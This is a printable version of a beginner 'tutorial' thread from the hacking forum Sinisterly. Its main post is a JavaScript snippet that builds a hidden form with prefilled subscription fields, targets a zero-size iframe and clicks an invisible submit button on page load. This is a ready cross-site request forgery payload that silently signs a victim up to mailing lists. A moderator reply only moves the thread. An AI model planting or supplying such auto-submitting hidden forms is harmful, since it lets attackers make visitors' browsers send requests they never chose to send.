Sinisterly
[For Beginners] How to get a automatic html post request - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: [For Beginners] How to get a automatic html post request (/Thread-For-Beginners-How-to-get-a-automatic-html-post-request)



[For Beginners] How to get a automatic html post request - hacxx - 11-27-2021

Code:
<script> document.write('<form method="post" name="subscribeform" action="http://127.0.0.1" target="zero">'); document.write('<input type="hidden" name="formtoken" value="9cf80e7901984c446df7aac12696c288">'); document.write('<input type="hidden" name="email" value="email@hotmail.com">'); document.write('<input type="hidden" name="htmlemail" value="1">'); document.write('<input type="hidden" name="attribute7" value="Joaquim">'); document.write('<input type="hidden" name="attribute6" value="Broodly">'); document.write('<input type="hidden" name="rssfrequency" value="daily">'); document.write('<input type="hidden" name="list[3]" value="signup">'); document.write('<input type="hidden" name="listname[3]" value="update">'); document.write('<input type="hidden" name="list[2]" value="signup">'); document.write('<input type="hidden" name="listname[2]" value="NKK Info">'); document.write('<input type="hidden" name="VerificationCodeX" value="">'); document.write('<input type="submit" name="subscribe" value="subscribe" style="height:0px; width:0px; background-color:#f0f0f2; border:0px">'); document.write('</form>'); document.write('<iframe name="zero" height="0" width="0" frameborder="0"></iframe>'); document.forms[0]["subscribe"].click(); </script>

Any question leave a reply....


RE: [For Beginners] How to get a automatic html post request - mothered - 11-28-2021

Moved from the Design Tutorials forum to Hacking Tutorials.